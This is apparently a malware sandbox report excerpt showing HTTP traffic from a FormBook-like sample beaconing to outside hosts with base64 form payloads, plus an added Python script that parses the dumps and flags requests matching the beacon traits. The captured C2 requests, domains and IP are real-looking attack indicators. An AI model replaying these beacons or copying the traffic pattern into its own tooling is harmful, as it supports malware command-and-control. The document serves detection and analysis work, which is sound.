                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Fables"> <meta name="author" content="Enterprise Development"> <link rel="shortcut icon" href="assets/custom/images/shortcut.png"> <title> 404</title> ... animate.css--> <link href="assets/vendor/animate.css-master/animate.min.css" rel="stylesheet"> ... Load Screen --> <link href="assets/vendor/loadscreen/css/spinkit.css" rel="stylesheet"> ... GOOGLE FONT --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i" rel="stylesheet"> ... Font Awesome 5 --> <link href="assets/vendor/fontawesome/css/fontawesome-all.min.css" rel="stylesheet"> ... Fables Icons --> <link href="assets/custom/css/fables-icons.css" rel="stylesheet"> ... Bootstrap CSS --> <link href="assets/vendor/bootstrap/css/boo [TRUNCATED]
                                                       Timestamp: Sep 11, 2024 11:18:24.239788055 CEST | Bytes transferred: 224 | Direction: IN
                                                       Data Raw: 62 6f 6f 74 73 74 72 61 70 2d 34 2d 6e 61 76 62 61 72 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 41 4e 43 59 20 42 4f 58 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61
                                                      Data Ascii: bootstrap-4-navbar.css" rel="stylesheet"> ... FANCY BOX --> <link href="assets/vendor/fancybox-master/jquery.fancybox.min.css" rel="stylesheet"> ... OWL CAROUSEL --> <link href="assets/vendor/owlcarousel/o
                                                       Timestamp: Sep 11, 2024 11:18:24.239837885 CEST | Bytes transferred: 1236 | Direction: IN
                                                       Data Raw: 77 6c 2e 63 61 72 6f 75 73 65 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6f 77 6c 63 61 72 6f 75 73 65 6c 2f 6f
                                                      Data Ascii: wl.carousel.min.css" rel="stylesheet"> <link href="assets/vendor/owlcarousel/owl.theme.default.min.css" rel="stylesheet"> ... Timeline --> <link rel="stylesheet" href="assets/vendor/timeline/timeline.css"> ... FABLES CUSTOM C
                                                       Timestamp: Sep 11, 2024 11:18:24.239885092 CEST | Bytes transferred: 1236 | Direction: IN
                                                       Data Raw: 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 2d 63 68 69 6c 64 20 73 6b 2d 64 6f 75 62 6c 65 2d 62 6f 75 6e 63 65 31 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 2d 63 68 69 6c 64 20 73 6b 2d 64 6f 75 62 6c 65 2d 62
                                                      Data Ascii: div class="sk-child sk-double-bounce1"></div> <div class="sk-child sk-double-bounce2"></div> </div></div>... Start Top Header --><div class="fables-forth-background-color fables-top-header-signin"> <div class="container">
                                                       Timestamp: Sep 11, 2024 11:18:24.239928007 CEST | Bytes transferred: 1236 | Direction: IN
                                                       Data Raw: 3e 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f
                                                      Data Ascii: > </div> </div> </div> <div class="col-12 col-sm-5 col-lg-4 text-right"> <p class="fables-third-text-color font-13"><span class="fables-iconphone"></sp
                                                       Timestamp: Sep 11, 2024 11:18:24.239962101 CEST | Bytes transferred: 672 | Direction: IN
                                                       Data Raw: 76 44 72 6f 70 64 6f 77 6e 22 20 61 72 69 61 2d 63 6f 6e 74 72 6f 6c 73 3d 22 66 61 62 6c 65 73 4e 61 76 44 72 6f 70 64 6f 77 6e 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 22 66 61 6c 73 65 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 54 6f 67
                                                      Data Ascii: vDropdown" aria-controls="fablesNavDropdown" aria-expanded="false" aria-label="Toggle navigation"> <span class="fables-iconmenu-icon text-white font-16"></span> </button>
                                                       Timestamp: Sep 11, 2024 11:18:24.239984035 CEST | Bytes transferred: 1236 | Direction: IN
                                                       Data Raw: 20 20 20 20 20 20 48 6f 6d 65 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                      Data Ascii: Home </a> <ul class="dropdown-menu" aria-labelledby="sub-nav1"> <li><a class="dropdown-item" href="home1.html">Ho
                                                       Timestamp: Sep 11, 2024 11:18:24.240005016 CEST | Bytes transferred: 1236 | Direction: IN
                                                       Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 22 3e 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                      Data Ascii: <ul class="dropdown-menu"> <li><a class="dropdown-item dropdown-toggle" href="#">Header 1</a> <ul class="dropdown-menu
                                                       Timestamp: Sep 11, 2024 11:18:24.240026951 CEST | Bytes transferred: 448 | Direction: IN
                                                       Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 22 20 68
                                                      Data Ascii: <li><a class="dropdown-item" href="header2-light.html">Header 2 Light</a></li> <li><a class="dropdown-item" href="header2-dark.html
                                                       Timestamp: Sep 11, 2024 11:18:24.240151882 CEST | Bytes transferred: 1236 | Direction: IN
                                                       Data Raw: 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 20 64 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65 22 20 68 72 65 66 3d 22 23 22 3e 48 65 61 64 65 72 20 33 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                      Data Ascii: lass="dropdown-item dropdown-toggle" href="#">Header 3</a> <ul class="dropdown-menu"> <li><a class="dropdown-item" href="header
                                                       Timestamp: Sep 11, 2024 11:18:24.246325016 CEST | Bytes transferred: 1236 | Direction: IN
                                                       Data Raw: 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 22 20 68 72 65 66 3d 22 68 65 61 64 65 72 34 2d 64 61 72 6b 2e 68 74 6d 6c 22 3e 48 65 61 64 65 72 20 34 20 44 61 72 6b 3c 2f 61 3e 3c 2f 6c 69 3e 0a
                                                      Data Ascii: <li><a class="dropdown-item" href="header4-dark.html">Header 4 Dark</a></li> </ul> </li>
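
The sessions above are the same exchange replayed against two hosts: a POST (and, in session 12, a GET) whose only payload is one base64-looking form field, sent with a fixed Chrome/46 User-Agent, a Referer equal to Origin plus the request path, Connection: close and Cache-Control: no-cache, and answered either by a JavaScript redirect stub or by a generic 404 page. As an added example that is not part of the Joe Sandbox report and not FormBook tooling, the Python below turns the flattened "Timestamp / Bytes transferred / Direction" rows and the "Data Raw" hex dumps into structured values and scores a parsed request against those observed traits. The indicator names, the four-indicator threshold and the benign comparison request are my own; the traits are read off these five sessions only, so treat the result as a triage heuristic, not as a FormBook signature.

```python
"""Structure the HTTP sessions Joe Sandbox renders as flat text and flag the
beacon pattern shared by the requests captured on this page (sessions 11-15).

Added example; not part of the sandbox report. Indicators are read off the
requests above; the >=4 threshold is an assumption tuned to these sessions."""
import re
from dataclasses import dataclass, field

REQ_LINE = re.compile(r"^(GET|POST) (\S+) HTTP/1\.[01]$")
# one field whose value looks like base64: "pP_8=LAr5q9...=="
FORM_FIELD = re.compile(r"^[A-Za-z0-9_]+=([A-Za-z0-9+/]{16,}={0,2})$")
# "Sep 11, 2024 11:18:12.906126022 CEST10889OUTPOST /xamn/ HTTP/1.1" as rendered
SESSION_LINE = re.compile(
    r"^(\w{3} \d{1,2}, \d{4} \d\d:\d\d:\d\d\.\d+ [A-Z]+)(\d+)(IN|OUT)(.*)$")
BEACON_UA = "Chrome/46.0.2490.4"  # User-Agent every request above carries

# Session 13 and session 12 requests copied from the page (Accept headers
# dropped for brevity); BENIGN_GET is a constructed comparison request.
SESSION13_POST = """POST /fava/ HTTP/1.1
Host: www.heldhold.xyz
Origin: http://www.heldhold.xyz
Content-Length: 201
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Connection: close
Referer: http://www.heldhold.xyz/fava/
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36

pP_8=LAr5q9LyWuo5N0ZPYHt9XfeLWvYgnbQpG4CRFSs9vV9QVFoCYLAxAobRPnn9uIwq3Jw7fDB2J7kJ0ppQ3s8GfjQPk5OdNDOOjWJKogcd7EFTI/tQdZqFYKw6xz6nGPJ9xcO2fvQqXt/gZvgxqCSsEDD/S7eIEEtaduDhsQS1gcR4Tv1BwULgB7kBSOfM/ZlNvQ==
"""
SESSION12_GET = """GET /xamn/?pP_8=eI40u+kXl6dCNOxuFKbCigR1N86mEgfKXPnA2oRVh57cb1FOyw5acKt1uSVkrtOGePUCnlUQIJS7kZjahSWR6R1adFopucWDE2ha6/s1PPXDYip6cFIdDHY=&V0Qh=4pBta8 HTTP/1.1
Host: www.mgeducacaopro.online
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
"""
BENIGN_GET = """GET /index.html HTTP/1.1
Host: www.example.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
"""


@dataclass
class HttpRequest:
    method: str
    path: str                      # request-target as sent, query included
    headers: dict = field(default_factory=dict)  # lower-cased header names
    body: str = ""


def parse_session_line(line: str):
    """Split a flattened 'Timestamp / Bytes / Direction / Data' row."""
    m = SESSION_LINE.match(line.strip())
    if not m:
        raise ValueError("unrecognised session line: %r" % line)
    ts, nbytes, direction, data = m.groups()
    return ts, int(nbytes), direction, data


def decode_data_raw(hex_dump: str) -> bytes:
    """Decode a 'Data Raw:' hex dump (space-separated byte values) to bytes."""
    return bytes.fromhex(hex_dump.replace("Data Raw:", "").strip())


def parse_request(text: str) -> HttpRequest:
    """Parse 'request line, headers, blank line, body' as shown on the page."""
    head, _, body = text.strip().partition("\n\n")
    lines = head.splitlines()
    m = REQ_LINE.match(lines[0].strip())
    if not m:
        raise ValueError("not an HTTP request line: %r" % lines[0])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpRequest(m.group(1), m.group(2), headers, body.strip())


def beacon_indicators(req: HttpRequest) -> list:
    """Traits of this request that match the beacons captured above."""
    h, hits = req.headers, []
    path, _, query = req.path.partition("?")
    if BEACON_UA in h.get("user-agent", ""):
        hits.append("ua-chrome46")
    if re.fullmatch(r"/[A-Za-z0-9]+/", path):      # "/xamn/", "/fava/"
        hits.append("single-dir-path")
    if h.get("connection", "").lower() == "close":
        hits.append("connection-close")
    if h.get("cache-control", "").lower() == "no-cache":
        hits.append("no-cache")
    if h.get("origin") and h.get("referer") == h["origin"] + path:
        hits.append("referer-equals-origin-path")
    # POST carries the field in the body, GET as the first query parameter
    payload = req.body if req.method == "POST" else query.split("&", 1)[0]
    if FORM_FIELD.match(payload):
        hits.append("base64-form-field")
    return hits


def is_beacon(req: HttpRequest) -> bool:
    """Assumed threshold: the base64 field plus at least three other traits."""
    hits = beacon_indicators(req)
    return "base64-form-field" in hits and len(hits) >= 4


if __name__ == "__main__":
    for name, raw in (("session 13", SESSION13_POST),
                      ("session 12", SESSION12_GET), ("benign", BENIGN_GET)):
        req = parse_request(raw)
        print(name, is_beacon(req), beacon_indicators(req))
```

The GET in session 12 scores lower than the POSTs because it carries neither Origin nor Referer, so the threshold is deliberately set so that it still trips on the fixed User-Agent, the one-directory path, Connection: close and the base64 query field; a request with only Connection: close and a Chrome/46 User-Agent does not.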


                                                       Session ID: 15 | Source IP: 192.168.2.4 | Source Port: 63331 | Destination IP: 67.223.117.189 | Destination Port: 80 | PID: 3496 | Process: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                       Timestamp: Sep 11, 2024 11:18:26.204415083 CEST | Bytes transferred: 10865 | Direction: OUT
                                                       POST /fava/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.heldhold.xyz
                                                      Origin: http://www.heldhold.xyz
                                                      Content-Length: 10301
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.heldhold.xyz/fava/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Raw: 70 50 5f 38 3d 4c 41 72 35 71 39 4c 79 57 75 6f 35 4e 55 70 50 55 41 5a 39 43 76 65 45 63 50 59 67 2b 4c 51 58 47 34 47 52 46 51 42 34 73 6a 46 51 56 55 34 43 59 75 55 78 48 59 62 52 4a 6e 6e 68 6a 6f 77 77 33 4a 30 4e 66 43 77 4c 4a 35 49 4a 30 49 35 51 2f 4f 45 46 55 7a 51 4e 67 35 50 4c 4e 44 4f 62 6a 57 5a 47 6f 67 49 6e 37 45 64 54 49 4e 31 51 4d 5a 71 43 46 36 77 36 78 7a 36 6a 47 50 4a 52 78 63 47 59 66 72 63 36 58 66 58 67 59 4b 30 78 35 78 71 76 43 44 44 42 4f 72 66 36 4b 6c 63 6d 62 38 57 61 76 54 47 55 70 6f 6c 2b 52 2b 55 4e 30 45 43 2f 47 72 63 56 62 5a 75 67 37 35 6c 45 79 51 53 57 5a 59 52 78 47 37 36 75 42 65 70 4b 67 44 6b 4f 69 2f 79 47 2b 4b 7a 2b 32 61 71 2f 72 43 74 4a 39 30 47 65 35 79 51 65 70 76 6e 79 63 39 79 71 51 61 49 76 72 35 37 4e 62 33 65 46 74 34 46 55 65 6b 68 35 4d 50 4d 6d 61 70 63 4d 64 30 6a 4b 42 58 77 4e 66 45 5a 6c 57 46 65 48 39 72 6b 6f 4b 30 41 38 57 6e 48 58 50 45 74 42 59 6a 56 4b 67 76 5a 61 32 47 54 67 57 70 78 4b 4d 70 31 64 48 4f 41 55 70 70 66 6b 76 [TRUNCATED]
                                                      Data Ascii: pP_8= [TRUNCATED]
                                                      Sep 11, 2024 11:18:26.797095060 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                      Date: Wed, 11 Sep 2024 09:18:26 GMT
                                                      Server: Apache
                                                      Content-Length: 32106
                                                      Connection: close
                                                      Content-Type: text/html
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Fables"> <meta name="author" content="Enterprise Development"> <link rel="shortcut icon" href="assets/custom/images/shortcut.png"> <title> 404</title> ... animate.css--> <link href="assets/vendor/animate.css-master/animate.min.css" rel="stylesheet"> ... Load Screen --> <link href="assets/vendor/loadscreen/css/spinkit.css" rel="stylesheet"> ... GOOGLE FONT --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i" rel="stylesheet"> ... Font Awesome 5 --> <link href="assets/vendor/fontawesome/css/fontawesome-all.min.css" rel="stylesheet"> ... Fables Icons --> <link href="assets/custom/css/fables-icons.css" rel="stylesheet"> ... Bootstrap CSS --> <link href="assets/vendor/bootstrap/css/boo [TRUNCATED]
                                                      Sep 11, 2024 11:18:26.797116041 CEST | 224 | IN | Data Raw: 62 6f 6f 74 73 74 72 61 70 2d 34 2d 6e 61 76 62 61 72 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 41 4e 43 59 20 42 4f 58 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61
                                                      Data Ascii: bootstrap-4-navbar.css" rel="stylesheet"> ... FANCY BOX --> <link href="assets/vendor/fancybox-master/jquery.fancybox.min.css" rel="stylesheet"> ... OWL CAROUSEL --> <link href="assets/vendor/owlcarousel/o
                                                      Sep 11, 2024 11:18:26.797132969 CEST | 1236 | IN | Data Raw: 77 6c 2e 63 61 72 6f 75 73 65 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6f 77 6c 63 61 72 6f 75 73 65 6c 2f 6f
                                                      Data Ascii: wl.carousel.min.css" rel="stylesheet"> <link href="assets/vendor/owlcarousel/owl.theme.default.min.css" rel="stylesheet"> ... Timeline --> <link rel="stylesheet" href="assets/vendor/timeline/timeline.css"> ... FABLES CUSTOM C
                                                      Sep 11, 2024 11:18:26.797148943 CEST | 1236 | IN | Data Raw: 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 2d 63 68 69 6c 64 20 73 6b 2d 64 6f 75 62 6c 65 2d 62 6f 75 6e 63 65 31 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 2d 63 68 69 6c 64 20 73 6b 2d 64 6f 75 62 6c 65 2d 62
                                                      Data Ascii: div class="sk-child sk-double-bounce1"></div> <div class="sk-child sk-double-bounce2"></div> </div></div>... Start Top Header --><div class="fables-forth-background-color fables-top-header-signin"> <div class="container">
                                                      Sep 11, 2024 11:18:26.797164917 CEST | 1236 | IN | Data Raw: 3e 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f
                                                      Data Ascii: > </div> </div> </div> <div class="col-12 col-sm-5 col-lg-4 text-right"> <p class="fables-third-text-color font-13"><span class="fables-iconphone"></sp
                                                      Sep 11, 2024 11:18:26.797220945 CEST | 672 | IN | Data Raw: 76 44 72 6f 70 64 6f 77 6e 22 20 61 72 69 61 2d 63 6f 6e 74 72 6f 6c 73 3d 22 66 61 62 6c 65 73 4e 61 76 44 72 6f 70 64 6f 77 6e 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 22 66 61 6c 73 65 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 54 6f 67
                                                      Data Ascii: vDropdown" aria-controls="fablesNavDropdown" aria-expanded="false" aria-label="Toggle navigation"> <span class="fables-iconmenu-icon text-white font-16"></span> </button>
                                                      Sep 11, 2024 11:18:26.798088074 CEST | 1236 | IN | Data Raw: 20 20 20 20 20 20 48 6f 6d 65 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                      Data Ascii: Home </a> <ul class="dropdown-menu" aria-labelledby="sub-nav1"> <li><a class="dropdown-item" href="home1.html">Ho
                                                      Sep 11, 2024 11:18:26.798104048 CEST | 1236 | IN | Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 22 3e 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                      Data Ascii: <ul class="dropdown-menu"> <li><a class="dropdown-item dropdown-toggle" href="#">Header 1</a> <ul class="dropdown-menu
                                                      Sep 11, 2024 11:18:26.798120022 CEST | 448 | IN | Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 22 20 68
                                                      Data Ascii: <li><a class="dropdown-item" href="header2-light.html">Header 2 Light</a></li> <li><a class="dropdown-item" href="header2-dark.html
                                                      Sep 11, 2024 11:18:26.798264027 CEST | 1236 | IN | Data Raw: 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 20 64 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65 22 20 68 72 65 66 3d 22 23 22 3e 48 65 61 64 65 72 20 33 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                      Data Ascii: lass="dropdown-item dropdown-toggle" href="#">Header 3</a> <ul class="dropdown-menu"> <li><a class="dropdown-item" href="header
                                                      Sep 11, 2024 11:18:26.802201986 CEST | 1236 | IN | Data Raw: 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 22 20 68 72 65 66 3d 22 68 65 61 64 65 72 34 2d 64 61 72 6b 2e 68 74 6d 6c 22 3e 48 65 61 64 65 72 20 34 20 44 61 72 6b 3c 2f 61 3e 3c 2f 6c 69 3e 0a
                                                      Data Ascii: <li><a class="dropdown-item" href="header4-dark.html">Header 4 Dark</a></li> </ul> </li>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      16 | 192.168.2.4 | 63332 | 67.223.117.189 | 80 | 3496 | C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Sep 11, 2024 11:18:28.747967958 CEST | 499 | OUT | GET /fava/?pP_8=GCDZpLqdSYk7fT5CRgwCB4qcStchn8AdfdSMH3wAhEJHSlsoeLITVJbnCwS/lbUV+KMqaRxHJZIr2IJ0lKwQCgtKpqiTYCqf8kUZvClY0WdZB6RiKYyZbbU=&V0Qh=4pBta8 HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Host: www.heldhold.xyz
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Sep 11, 2024 11:18:29.321966887 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                      Date: Wed, 11 Sep 2024 09:18:29 GMT
                                                      Server: Apache
                                                      Content-Length: 32106
                                                      Connection: close
                                                      Content-Type: text/html; charset=utf-8
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 [TRUNCATED]
